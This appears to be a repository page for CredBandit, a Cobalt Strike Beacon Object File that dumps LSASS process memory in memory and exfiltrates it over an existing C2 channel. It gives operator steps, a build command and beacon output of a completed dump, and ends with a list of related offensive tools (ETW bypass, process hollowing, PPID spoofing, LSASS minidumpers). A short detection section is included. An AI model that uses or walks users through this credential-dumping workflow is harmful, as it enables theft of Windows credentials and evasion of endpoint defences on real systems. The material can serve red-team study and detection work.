CredBandit - Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel

Overview

CredBandit

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions which allows us to write the dump to memory and the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS's implementation of MiniDumpWriteDump.

The memory dump is then downloaded over the beacon with Beacon's native download functionality. The advantage of doing it this way is that the dump is never written to disk and is sent via your already established C2 channel.

Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

Getting Started

  1. Copy the credBandit folder with all of its contents and place it a directory just above your cobaltstrike folder on whatever system you plan to connect with via the GUI application.
  2. Load in the MiniDumpWriteDump.cna Aggressor script
  3. Run credBandit against target LSASS process (or other process)
  4. Download the dump file from the Aggressor Downloads console
  5. Use Mimikatz to extract the dump file

Build Your Own

Run the below command inside the src directory

x86_64-w64-mingw32-gcc -o credBanditx64.o -c credBandit.c  -masm=intel

Use Case

With High or SYSTEM integrity, the operator can perform a memory dump of LSASS without ever touching disk

Syntax

Perform memory dump and send back through CS using BeaconPrintf function. The second parameter of output name is optional and will show up in the Aggressor Downloads console as mem:\[output].dmp

beacon> credBandit 708 output
[*] Running credBandit by (@anthemtotheego)
[+] host called home, sent: 18696 bytes
[+] received output:
[+] Attempting To Enable Debug Privs

[+] received output:
[+] Attempting To Dump Proccess 708

[+] received output:
[+] NtOpenProcess returned HANDLE 0x00000000000006CC

[+] received output:
[+] NtCreateTransaction returned HANDLE 0x00000000000006D4

[+] received output:
[+] RtlSetCurrentTransaction successfully set

[+] received output:
[+] NtCreateFile returned HANDLE 0x00000000000006D8

[+] received output:
[+] RtlSetCurrentTransaction successfully set

[+] received output:
[+] OS Version: 10.0.19042

[+] received output:
[+] MiniDump written to memory

[+] received output:
[+] MiniDump Size In Bytes = 109868198

[+] received output:
[+] NtCreateSection created

[+] received output:
[+] NtMapViewOfSection successful

[*] started download of mem:\output.dmp (109868198 bytes)
[*] download of output.dmp is complete

Caveats

  1. While I have tried to make this pretty stable, Although this method has become more stable with the download method, BOFs still carry the risk of causing a beacon to crash. Use at your own risk.
  2. Since the BOF is executed in process and takes over the beacon while running, sleep time is not relevant. Data will be continously sent while dump is exfiltrated.
  3. Lastly, I commented in the code places where you could make modifications if you wanted to do other stuff, for example, write to disk instead, add in different encoding/encryption, Comms, etc.

Detection

Some detection and mitigation strategies that could be used:

  1. Credential Guard here
  2. Event Tracing here
  3. Looking for suspicious processes touching LSASS
  4. Looking for other known Cobalt Strike Beacon IOC's or C2 egress/communication IOC's.
Issues
  • NtOpenProcessToken failed

    NtOpenProcessToken failed

    Hello, i ran beacon as system on my Windows10 VM, and trying to dump lsass, i got the following error:

    [*] Running credBandit by (@anthemtotheego) [+] host called home, sent: 17812 bytes [+] received output: [+] Attempting To Enable Debug Privs

    [-] Failed to open process token

    [-] Failed to adjust process token [+] received output: [+] Attempting To Dump Proccess 720

    [-] [-] NtOpenProcess failed with status 351000

    Seems that i cannot even NtOpenProcessToken, i tried from different process, same thing.

    Do you know what's the issue ?

    Thanks

    opened by Antho59 0
Owner
anthemtotheego
anthemtotheego
Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR

Detect-Hooks Detect-Hooks is a proof of concept Beacon Object File (BOF) that attempts to detect userland API hooks in place by AV/EDR. The BOF will r

anthemtotheego 119 Jul 29, 2022
Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.

Cobalt Strike "Where Am I?" Beacon Object File Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environmen

Bobby Cooke 86 Jul 27, 2022
Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory. Supports Parent Process ID (PPID) spoofing & blocking non-MS signed DLLs from loading into the processes memory (some EDR DLLs).

boku 337 Jul 30, 2022
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 225 Jul 29, 2022
This repo does not contain any skins that work by themselves, but rather addons to already existing skins like CakeOS and Polybar

Rainmeter-addons ⚠ This repo does not contain any skins that work by themselves, but rather addons to already existing skins like CakeOS and Polybar E

null 4 Oct 17, 2021
An implementation and proof-of-concept of Process Forking.

ForkPlayground A library to implement the Process Forking attack described in this blog post. ForkLib - C++ library that implements the Process Forkin

Bill Demirkapi 153 Jul 31, 2022
A Beacon Object File that creates a minidump of the LSASS process.

NanoDump A Beacon Object File that creates a minidump of the LSASS process. Features It uses syscalls (with SysWhispers2) for most operations You can

HelpSystems 917 Jul 31, 2022
A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks.

manual-syscall-detect A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks. Description A full write-up of this to

Conor Richard 66 Jul 24, 2022
Small commandlet for generating a complete project using UE4SS header dump, Project File and Plugin Manifest

UE4GameProjectGenerator Small commandlet for generating a complete project using UE4SS header dump, Project File and Plugin Manifest Usage Compile the

null 6 Jul 1, 2022
A BOF for enumerating version information for DLLs associated for a Beacon process.

DLL Image Resource Version Enumeration BOF What is this? This is a Cobalt Strike BOF file (a mildly massaged port of @N4k3dTurtl3's existing PoC , mea

null 8 May 30, 2022
Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system

The Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system.

Ulf Frisk 1.4k Aug 8, 2022
Proof of concept userspace filesystem that executes filenames as shell commands and makes the result accessible though reading the file.

ExecFS Proof of concept userspace filesystem that executes filenames as shell commands and makes the result accessible though reading the file. $ ./ex

Camel Coder 27 Jul 20, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Bobby Cooke 190 Jul 27, 2022
Easy Dump ELF libil2cpp.so from Android Process Memory

PAD (Process Android Dumper) This dumper is made for il2cpp game but you can use it in any app you want How To Use Run the process Open PADumper Put p

BryanGIG 34 Jul 29, 2022
BOF implementation of chlonium tool to dump Chrome/Edge Masterkey

ChromiumKeyDump BOF implementation of Chlonium tool to dump Chrome/Edge Masterkey. Forked from https://github.com/crypt0p3g/bof-collection Setup How t

null 2 Feb 12, 2022
Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

Process Ghosting This is my implementation of the technique presented by Gabriel Landau: https://www.elastic.co/blog/process-ghosting-a-new-executable

hasherezade 470 Aug 7, 2022
Send messages to a LED Matrix display through Telegram. Inspired by a tweet from Smarter Every Day

Send messages to a LED Matrix display through Telegram. Inspired by a tweet from Smarter Every Day

Brian Lough 22 Jun 13, 2022
Go through the readme... fork ....add....send a pull request .... get yourself in the contribution list...Plant the tree

Hacktoberfest 2021 Follow the README below to get started! Table of contents Getting Started The Process The Process star this repo Fork this reposito

Aditya Deshmukh 6 Jan 5, 2022
A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types and values using Ptrace during program execution.

print-function-args-debugger A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types an

*finixbit 15 Jun 17, 2022